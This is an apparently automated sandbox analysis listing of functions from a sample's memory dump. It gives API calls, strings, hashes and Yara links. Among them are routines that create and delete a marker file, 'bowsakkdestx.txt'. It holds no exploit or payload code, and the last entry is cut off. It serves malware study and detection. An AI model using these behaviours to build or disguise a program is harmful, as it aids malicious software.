Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
DispatchMessageW.USER32(?), ref: 0041FA7B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
DispatchMessageW.USER32(?), ref: 0041FE2B
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

string too long, xrefs: 00417D36
invalid string position, xrefs: 00417D2C

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

string too long, xrefs: 00414256
invalid string position, xrefs: 00414260

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7
C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,?), ref: 0040C5F6
RpcStringFreeA.RPCRT4(?), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(006E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 1059622496-2104205924
Opcode ID: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: eeb942be7a8daecd01f402b1fc71538ff316d088b395842a07765e87b7e27695
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32(00000030), ref: 0041BA73

Strings

LPCWSTRszWindowClass, xrefs: 0041BA65
0, xrefs: 0041BA1D

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00419EB8
_memset.LIBCMT ref: 00419EC9
_memset.LIBCMT ref: 00419EDA

Strings

p2Q, xrefs: 00419EE2

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 004C70AB

Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9

_UnwindNestedFrames.LIBCMT ref: 004C70C2
___FrameUnwindToState.LIBCMT ref: 004C70D4
CallCatchBlock.LIBCMT ref: 004C70F8

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5

Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015

__calloc_crt.LIBCMT ref: 00425A01

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__lock.LIBCMT ref: 00425A37
___addlocaleref.LIBCMT ref: 00425A43
__lock.LIBCMT ref: 00425A57

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
String ID:
API String ID: 2580527540-0
Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(006E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 3705855051-0
Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00412806
_malloc.LIBCMT ref: 00412814

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(006E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 0041281F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 3705855051-0
Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004149F1

Strings

string too long, xrefs: 00414C33
invalid string position, xrefs: 00414C3D

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

string too long, xrefs: 00417EE9
invalid string position, xrefs: 00417EDF

Memory Dump Source

